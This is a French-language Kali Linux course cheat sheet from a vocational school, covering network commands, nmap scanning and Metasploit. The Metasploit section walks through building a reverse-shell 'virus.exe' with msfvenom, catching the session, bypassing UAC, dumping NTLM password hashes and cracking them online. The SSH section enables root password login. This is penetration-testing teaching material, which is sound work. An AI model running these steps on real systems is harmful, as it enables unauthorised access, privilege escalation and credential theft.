<!--
Copyright (C) 2019-2020 - EPTM (École professionnelle technique et des métiers) - [Pascal Rapaz](mailto:pascal.rapaz@eptm.ch)

Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3
or any later version published by the Free Software Foundation;
with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.

A copy of the license is agreement is available at [GNU Free Documentation License](https://www.gnu.org/licenses/fdl-1.3.txt)".
-->

# Kali GNU/Linux <!-- omit in toc -->

## Table des matières <!-- omit in toc -->

- [VMWare](#vmware)
- [Network](#network)
  - [Serveur SSH](#serveur-ssh)
- [Commandes bash](#commandes-bash)
  - [ip](#ip)
    - [Adresses IP](#adresses-ip)
    - [Gestion des routes](#gestion-des-routes)
    - [Gestion des serveurs DNS](#gestion-des-serveurs-dns)
    - [Monitoring](#monitoring)
    - [Tables ARP](#tables-arp)
  - [mtr](#mtr)
  - [dig](#dig)
  - [nmap](#nmap)
- [Metasploit](#metasploit)
  - [Meterpreter](#meterpreter)
    - [msfvenom](#msfvenom)
      - [Élévation des droits](#élévation-des-droits)
      - [Hack du mot de passe Windows](#hack-du-mot-de-passe-windows)
- [Wi-Fi Phishing](#wi-fi-phishing)
  - [Edimax Wi-Fi AC1200 USB 3.0 - EW-7822UTC (rtl8822bu)](#edimax-wi-fi-ac1200-usb-30-ew-7822utc-rtl8822bu)
- [Sources](#sources)

# VMWare

- Autoriser tous les utilisateurs à accéder en lecture/écriture sur la carte réseau utilisée par VMWare (*promiscuous mode*)
  
  `chmod a+rw /dev/vmnet0`

  > :information_source: **_INFO_**
  >
  > Cette modification n'est pas permanente. Cette commande doit être exécutée à chaque redémarrage de votre hôte GNU/Linux

# Network

## Serveur SSH

1. Installez le serveur `openssh`

   ```bash
   sudo apt install openssh-server
   ```

2. Autorisez les accès `ssh` à l'utilisateur `root`

   Éditez le fichier `/etc/ssh/sshd_config` et remplacez :

   ```less
   #PermitRootLogin prohibit-password 
   ```

   par

   ```less
   PermitRootLogin yes
   ```

3. Activez le service `ssh` à chaque démarrage

   ```bash
   sudo systemctl enable ssh
   ```

4. Vérifiez l'état du service

   ```bash
   sudo systemctl status ssh
   ```

5. Démarrez le service s'il est inactif

   ```bash
   sudo systemctl start ssh
   ```

6. Vérifiez les accès avec la commande `ssh` (ou `Putty` sous Windows)

   ```bash
   ssh [IP_Publique]
   ```

# Commandes bash

## ip

`ip` est utilisée pour gérer les adresses IP des interfaces réseaux.

- Afficher toutes les adresses IP des interfaces réseaux : `ip a`

  ```bash
  $ ip a

  1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
      link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
      inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
      inet6 ::1/128 scope host 
        valid_lft forever preferred_lft forever
  2: wlp2s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
      link/ether 9c:b6:d0:90:0b:0f brd ff:ff:ff:ff:ff:ff
      inet 192.168.43.205/24 brd 192.168.43.255 scope global dynamic noprefixroute wlp2s0
        valid_lft 2951sec preferred_lft 2951sec
      inet6 fe80::d350:7e1d:2008:4f52/64 scope link noprefixroute 
        valid_lft forever preferred_lft forever
  3: enxe4b97a9f78fc: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 1000
      link/ether e4:b9:7a:9f:78:fc brd ff:ff:ff:ff:ff:ff
  ```

- Activer une interface : `ip link set {interface} up`

  ```bash
  ip link set eth0 up
  ```

- Désactiver une interface : `ip link set {interface} down`
  
  ```bash
  ip link set eth0 down
  ```

- Supprimer la configuration d'une carte réseau : `sudo ip a flush dev {interface}`
  > Cette commande peut être exécutée avant d'assigner une adresse, car cela permet de partir d'une configuration "propre" et évite les erreurs de type `RTNETLINK answers: File exists`

  ```bash
  sudo ip a flush dev eth0
  ```

### Adresses IP

- Assigner une adresse IP à une interface : `ip a add {ip_addr/mask} dev {interface}`
  
  ```bash
  sudo ip a add 192.168.1.100/255.255.255.0 dev eth0
  ```

- Supprimer une adresse IP d'une interface : `ip a del {ip_addr} dev {interface}`
  
  ```bash
  sudo ip a del 192.168.1.100 dev eth0
  ```

### Gestion des routes

- Afficher la liste des routes : `ip route`

  ```bash
  $ ip route

  default via 192.168.43.240 dev eth0 proto dhcp metric 600 
  169.254.0.0/16 dev eth0 scope link metric 1000 
  192.168.43.0/24 dev eth0 proto kernel scope link src 192.168.43.205 metric 600 
  ```

- Créer une route par défaut : `ip route add default gw {gateway} {interface}`

  ```bash
  sudo ip route add default gw 192.168.1.1 eth0
  ```

### Gestion des serveurs DNS

La gestion des serveurs DNS s'effectue via le fichier de configuration `/etc/resolv.conf`.

Pour ajouter une entrée dans ce fichier, vous pouvez utiliser la commande suivante ou éditer le fichier.

```bash
sudo echo "nameserver 8.8.8.8" > /etc/resolv.conf
```

### Monitoring

- Monitorer les changements qui surviennent sur une interface : `ip mon`
  > Cette commande peut être utilisée pour surveiller les modifications dans les tables de routage, les adresses réseaux ainsi que les modifications dans les tables ARP locales.  

  ```bash
  ip mon
  ```

### Tables ARP

- Afficher le contenu des tables ARP : `ip neigh`

  ```bash
  $ ip neigh

  192.168.43.240 dev eth0 lladdr 62:5c:23:bd:12:bd REACHABLE
  ```

- Ajouter une entrée ARP : `ip neigh add {ip_address} lladdr {mac_address} dev {interface}`

  ```bash
  sudo ip neigh add 192.168.1.200 lladdr a2:b7:41:e8:22:f3 dev eth0
  ```

- Supprimer une entrée ARP : `ip neigh del {ip_address} dev {interface}`
  
  ```bash
  sudo ip neigh del 192.168.1.200 dev eth0
  ```

## mtr

La commande `mtr` combine les fonctionnalités de `traceroute` et `ping` dans une seule commande : `mtr {ip_address | domain_name}`

```bash
$ mtr google.com
                            My traceroute  [v0.93]
{hostname} ({IP})                                       2019-12-09T15:41:27+0100
Keys:  Help   Display mode   Restart statistics   Order of fields   quit
                                        Packets               Pings
 Host                                 Loss%   Snt   Last   Avg  Best  Wrst StDev
 1. _gateway                           0.0%     5    2.9   3.6   2.9   3.9   0.4
 2. 192.168.12.122                     0.0%     5   35.7 149.3  35.7 225.3  79.8
 3. 192.168.12.98                      0.0%     5   30.1  32.0  26.0  37.8   5.0
 4. 134.3.1.2                          0.0%     5   29.4  29.6  19.6  36.0   6.6
 5. i79zhh-015-ae12.bb.ip-plus.net     0.0%     5   45.3  35.7  30.4  45.3   6.1
```

## dig

Permet d'interroger les serveurs DNS pour obtenir les informations définies pour un domaine déterminé.

- Réponse normale : `dig {domain_name}` ou `dig -x {ip_address}`

  ```bash
  $ dig google.com

  ; <<>> DiG 9.11.5-P4-5.1ubuntu2.1-Ubuntu <<>> google.com
  ;; global options: +cmd
  ;; Got answer:
  ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4958
  ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

  ;; OPT PSEUDOSECTION:
  ; EDNS: version: 0, flags:; udp: 65494
  ;; QUESTION SECTION:
  ;google.com.    IN    A

  ;; ANSWER SECTION:
  google.com.    154    IN    A    172.217.168.14

  ;; Query time: 47 msec
  ;; SERVER: 127.0.0.53#53(127.0.0.53)
  ;; WHEN: lun déc 09 13:02:41 CET 2019
  ;; MSG SIZE  rcvd: 55
  ```

- Réponse courte : `dig {domain_name} +short`

  ```bash
  $ dig google.com +short

  172.217.168.46
  ```

- Réponse détaillée : `dig {domain_name} +noall +answer`

  ```bash
  $ dig google.com +noall +answer

  ; <<>> DiG 9.11.5-P4-5.1ubuntu2.1-Ubuntu <<>> google.com +noall +answer
  ;; global options: +cmd
  google.com.             39      IN      A       172.217.168.46
  ```

- Interrogation d'un serveur de domaine spécifique : `dig {domain_name} @{ip_server}`
  
  ```bash
  $ dig google.com @8.8.8.8

  ; <<>> DiG 9.11.5-P4-5.1ubuntu2.1-Ubuntu <<>> google.com @8.8.8.8
  ;; global options: +cmd
  ;; Got answer:
  ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37817
  ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

  ;; OPT PSEUDOSECTION:
  ; EDNS: version: 0, flags:; udp: 512
  ;; QUESTION SECTION:
  ;google.com.                    IN      A

  ;; ANSWER SECTION:
  google.com.             197     IN      A       216.58.215.238

  ;; Query time: 38 msec
  ;; SERVER: 8.8.8.8#53(8.8.8.8)
  ;; WHEN: lun déc 09 13:10:00 CET 2019
  ;; MSG SIZE  rcvd: 55
  ```

- Afficher la liste de tous les serveurs de mail d'un domaine spécifique (MX records) : `dig +nocmd {domain_name} mx +noall +answer`
  
  ```bash
  $ dig +nocmd google.com mx +noall +answer

  google.com.             569     IN      MX      40 alt3.aspmx.l.google.com.
  google.com.             569     IN      MX      30 alt2.aspmx.l.google.com.
  google.com.             569     IN      MX      20 alt1.aspmx.l.google.com.
  google.com.             569     IN      MX      50 alt4.aspmx.l.google.com.
  google.com.             569     IN      MX      10 aspmx.l.google.com.
  ```

## nmap

`nmap` permet de scanner le réseau à la recherche des machines connectées ainsi que de services utilisés.

- Lister les machines d'un réseau : `nmap -sL [ip]/[mask]`

  ```bash
  $ nmap -sL 192.168.1.0/24

  ...
  Nmap scan report for 192.168.1.253
  Nmap scan report for 192.168.1.254
  Nmap scan report for 192.168.1.255
  Nmap done: 256 IP addresses (0 hosts up) scanned in 10.36 seconds
  ```

- Lister et pinger les machines d'un réseau : `nmap -sP [ip]/[mask]`

  ```bash
  $ nmap -sP 192.168.1.0/24

  Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-16 09:30 CET
  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0080s latency).
  Nmap scan report for kalivm (192.168.1.239)
  Host is up (0.00018s latency).
  Nmap done: 256 IP addresses (2 hosts up) scanned in 3.02 seconds
  ```

- Scanner tous les ports ouverts sur une machine : `nmap [IP/host]`

  ```bash
  $ nmap 192.168.1.1

  Host is up (0.0088s latency).
  Not shown: 996 closed ports
  PORT     STATE SERVICE
  53/tcp   open  domain
  80/tcp   open  http
  515/tcp  open  printer
  9100/tcp open  jetdirect
  ```

- Scanner tous les ports ouverts et chercher afficher le détail des services qui utilisent les ports : `nmap -A [IP/host]`
  > Ajoutez l'option `-T4` pour augmenter la vitesse d'exécution
  
  ```bash
  $ nmap -A 192.168.1.1

  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0065s latency).
  Not shown: 996 closed ports
  PORT     STATE SERVICE    VERSION
  53/tcp   open  domain     dnsmasq 2.76-g0007ee9
  | dns-nsid: 
  |_  bind.version: dnsmasq-2.76-g0007ee9
  80/tcp   open  http       Acme milli_httpd 2.0 (ASUS RT-AC-series router)
  |_http-server-header: httpd/2.0
  |_http-title: Site doesn't have a title (text/html).
  515/tcp  open  printer
  9100/tcp open  jetdirect?
  Service Info: Device: broadband router
  ```

- Scanner tous les ports ouverts et chercher la version des services qui utilisent les ports : `nmap -sV [IP/host]`
  > Ajoutez l'option `-T4` pour augmenter la vitesse d'exécution

  ```bash
  $ nmap -sV 192.168.1.1
  
  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0056s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE VERSION
  53/tcp open  domain  dnsmasq 2.76-g0007ee9
  80/tcp open  http    Acme milli_httpd 2.0 (ASUS RT-AC-series router)
  Service Info: Device: broadband router
  ```

- Scanner un intervalle de ports : `nmap -p [start-end] [IP]`

  ```bash
  $ nmap -p 1-65535 192.168.1.1
  
  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.019s latency).
  Not shown: 65525 closed ports
  PORT      STATE SERVICE
  53/tcp    open  domain
  80/tcp    open  http
  515/tcp   open  printer
  1990/tcp  open  stun-p1
  3394/tcp  open  d2k-tapestry2
  3838/tcp  open  sos
  5473/tcp  open  apsolab-tags
  9100/tcp  open  jetdirect
  18017/tcp open  unknown
  54782/tcp open  unknown

  Nmap done: 1 IP address (1 host up) scanned in 6.33 seconds
  ```

- Scanner une liste de ports : `nmap -p [p1,p2] [IP]`

  ```bash
  $ nmap -p 80,443 192.168.1.1

  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0044s latency).

  PORT    STATE  SERVICE
  80/tcp  open   http
  443/tcp closed https

  Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
  ```

- Scanner plusieurs adresses IP : `nmap [IP/host] [IP/host]`

  ```bash
  $ nmap 192.168.1.1 google.ch

  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0038s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE
  53/tcp open  domain
  80/tcp open  http

  Nmap scan report for google.ch (172.217.168.67)
  Host is up (0.0035s latency).
  Other addresses for google.ch (not scanned): 2a00:1450:400a:803::2003
  rDNS record for 172.217.168.67: zrh04s15-in-f3.1e100.net
  Not shown: 996 filtered ports
  PORT     STATE  SERVICE
  80/tcp   open   http
  113/tcp  closed ident
  443/tcp  open   https
  8008/tcp open   http

  Nmap done: 2 IP addresses (2 hosts up) scanned in 4.40 seconds
  ```

- Scanner les ports les plus courant : `nmap --top-ports 5 192.168.1.1`
  > Remplacez '5' pour scanner plus de ports

  ```bash
  $ nmap --top-ports 5 192.168.1.1

  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0036s latency).

  PORT    STATE  SERVICE
  21/tcp  closed ftp
  22/tcp  closed ssh
  23/tcp  closed telnet
  80/tcp  open   http
  443/tcp closed https

  Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
  ```

- Utiliser un fichier d'adresses à scanner : `nmap -iL list.txt`

  ```bash
  $ cat list.txt
  
  192.168.1.1
  google.com
  stackoverflow.com

  $ nmap -iL list.txt

  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0056s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE
  53/tcp open  domain
  80/tcp open  http

  ...

  Nmap done: 3 IP addresses (3 hosts up) scanned in 6.02 seconds
  ```

- Utiliser un script pour rechercher d'éventuelles failles de sécurité : `nmap -Pn --script [script.lua] [IP]`

  ```bash
  $ nmap -Pn --script vuln 192.168.1.1
  
  Pre-scan script results:
  | broadcast-avahi-dos: 
  |   Discovered hosts:
  |     224.0.0.251
  |   After NULL UDP avahi packet DoS (CVE-2011-1002).
  |_  Hosts are all up (not vulnerable).
  Nmap scan report for router.asus.com (192.168.1.1)
  Host is up (0.0062s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE
  53/tcp open  domain
  |_clamav-exec: ERROR: Script execution failed (use -d to debug)
  80/tcp open  http
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  | http-slowloris-check: 
  |   VULNERABLE:
  |   Slowloris DOS attack
  |     State: LIKELY VULNERABLE
  |     IDs:  CVE:CVE-2007-6750
  |       Slowloris tries to keep many connections to the target web server open and hold
  |       them open as long as possible.  It accomplishes this by opening connections to
  |       the target web server and sending a partial request. By doing so, it starves
  |       the http server's resources causing Denial Of Service.
  |       
  |     Disclosure date: 2009-09-17
  |     References:
  |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
  |_      http://ha.ckers.org/slowloris/
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
  ```

# Metasploit

- Démarrer la base de données : `sudo msfdb init`
- Démarer la console `msfconsole`
- Rechercher un module : `search [keyword]`

  ```bash
  > search portscan

  Matching Modules
  ================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
  ```

- Utiliser un module : `use [module]`

  ```bash
  > use auxiliary/scanner/portscan/tcp
  msf5 auxiliary(scanner/portscan/tcp) > 
  ```

- Afficher les options d'un module : `show options` ou  `info`

  ```bash
  > show options 

  Module options (auxiliary/scanner/portscan/tcp):

    Name         Current Setting  Required  Description
    ----         ---------------  --------  -----------
    CONCURRENCY  10               yes       The number of concurrent ports to check per host
    DELAY        0                yes       The delay between connections, per thread, in milliseconds
    JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
    PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
    RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    THREADS      1                yes       The number of concurrent threads (max one per host)
    TIMEOUT      1000             yes       The socket connect timeout in milliseconds
  ```

- Affecter une valeur à une options : `set [Name] [Value]`

  ```bash
  > set RHOSTS 192.168.1.100
  ```

- Exécuter un module : `run`

  ```bash
  > run

  [+] 192.168.1.100:       - 192.168.1.100:21 - TCP OPEN
  [+] 192.168.1.100:       - 192.168.1.100:135 - TCP OPEN
  [+] 192.168.1.100:       - 192.168.1.100:139 - TCP OPEN
  ```

<!-- 
modules : 
sniffer : auxiliary/sniffer/psnuffle
-->

## Meterpreter

`Meterpreter` est un outil qui permet d'établir une communication entre l'attaquant et sa victime en injectant un `payload`.

### msfvenom

`msfvenom` permet de générer un `payload`

L'exemple suivant crée un fichier `virus.exe` qui établira une communication `tcp` avec votre machine une fois déployé sur le PC de la victime :

```bash
> msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=192.168.1.50 LPORT=5555 -f exe > virus.exe
```

Ensuite, exécutez le fichier `viruse.exe` sur le poste de la victime et démarrez une application qui ouvrira un accès sur cette dernière :

```bash
> use exploit/multi/handler
> set LPORT 5555
> run

[*] Started reverse TCP handler on 192.168.1.50:5555 
[*] Sending stage (180291 bytes) to 192.168.1.120
[*] Meterpreter session 1 opened (192.168.1.50:5555 -> 192.168.1.120:50574) at 2020-01-20 16:36:33 +0100

meterpreter >
```

Une fois connecté, vous pouvez affichez les différentes commandes disponibles avec `help`.

#### Élévation des droits

Une fois connecté au système, vous pouvez essayer d'obtenir les droits d'administration.

1. Vérifiez les droits actuels : `getsystem`

   ```bash
   meterpreter > getsystem
   [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
   [-] Named Pipe Impersonation (In Memory/Admin)
   [-] Named Pipe Impersonation (Dropper/Admin)
   [-] Token Duplication (In Memory/Admin)
   ```

2. Mettez en tâche de fond l'interprêteur 'meterpreter' : `bg`

   ```bash
   meterpreter > bg
   [*] Backgrounding session 2...
   ```

3. Recherchez des exploits permettant de "casser" la protection UAC : `search bypassuac`

   ```bash
   > search bypassuac

   Matching Modules
   ================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   ...
   ```

4. Testez différents `exploits` pour essayer d'obtenir les privilèges

   ```bash
   > use exploit/windows/local/bypassuac_fodhelper
   > show options
     Module options (exploit/windows/local/bypassuac_fodhelper):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     SESSION                   yes       The session to run this module on.

   > set SESSION 2
   > run
     [*] Started reverse TCP handler on 192.168.1.50:4444 
     [*] UAC is Enabled, checking level...
     [+] Part of Administrators group! Continuing...
     [+] UAC is set to Default
     [+] BypassUAC can bypass this setting, continuing...
     [*] Configuring payload and stager registry keys ...
     [*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
     [*] Sending stage (180291 bytes) to 192.168.43.181
     [*] Meterpreter session 4 opened (192.168.43.60:4444 -> 192.168.43.181:49855) at 2020-02-03 11:25:07 +0100
     [*] Cleaining up registry keys ...

   meterpreter > getsystem
   ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
   ```

#### Hack du mot de passe Windows

1. Mettez en tâche de fond l'interprêteur 'meterpreter' : `bg`

   ```bash
   meterpreter > bg
   [*] Backgrounding session 2...
   ```

2. Recherchez un outil permettant de faire un dump du mot de passe : `search hashdump`

3. Récupérez le hash code des mots de passe :

   ```bash
   > use post/windows/gather/hashdup
   > set SESSION 2
   > run

   [*] Obtaining the boot key...
   [*] Calculating the hboot key using SYSKEY da7320facf15c8291c23003317b05918...
   [*] Obtaining the user list and keys...
   [*] Decrypting user keys...
   [*] Dumping password hints...

   No users with password hints on this system

   [*] Dumping password hashes...

   admin:1001:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::
   ```

4. Crackez le hash code `NTLM` (`92937945b518814341de3f726500d4ff`) sur internet :
   - <https://crackstation.net/>
   - <https://hashtoolkit.com/decrypt-hash/>
   - <https://www.onlinehashcrack.com/>
   - <https://hashkiller.io/>

# Wi-Fi Phishing

## Edimax Wi-Fi AC1200 USB 3.0 - EW-7822UTC (rtl8822bu)

1. Changez le configuration de votre VM afin de prendre en charge l'USB 3
2. Téléchargez le [driver](https://github.com/EntropicEffect/rtl8822bu) avec git
3. Compilez et installez le driver
4. Éditez le fichier `/etc/NetworkManager/NetworkManager.conf` et ajoutez :

   ```bash
   [device]
   wifi.scan-rand-mac-address=no
   ```

5. Redémarrez la VM
6. Testez la connexion au réseau Wi-FI
7. Exécutez la commande `airmon-ng`, le résultat doit être proche de celui-ci :

   ```bash
   PHY   Interface  Driver     Chipset
   phy1  wlan0      rtl88x2bu  Edimax Technology Co., Ltd AC1200 MU-MIMO USB3.0 Adapter
   ```

8. Vérifiez que votre interface réseau supporte le monitoring : `iw list | grep monitor`

# Sources

- [Kali Training](https://kali.training/)
- [Kali Linux Tools Listing](https://tools.kali.org/tools-listing)
- [HackingVision](https://hackingvision.com/)
- [A Practical Guide to Nmap (Network Security Scanner) in Kali Linux](https://www.tecmint.com/nmap-network-security-scanner-in-kali-linux/)
- [The Best 20 Hacking and Penetration Tools for Kali Linux](https://www.fossmint.com/kali-linux-hacking-and-penetration-tools/)
- [Dig Command in Linux (DNS Lookup)](https://linuxize.com/post/how-to-use-dig-command-to-query-dns-in-linux/)

<br /><p style='text-align: right;'><sub>&copy; 2019-2020 - EPTM (École professionnelle technique et des métiers) - [Pascal Rapaz](mailto:pascal.rapaz@eptm.ch)</sub></p>
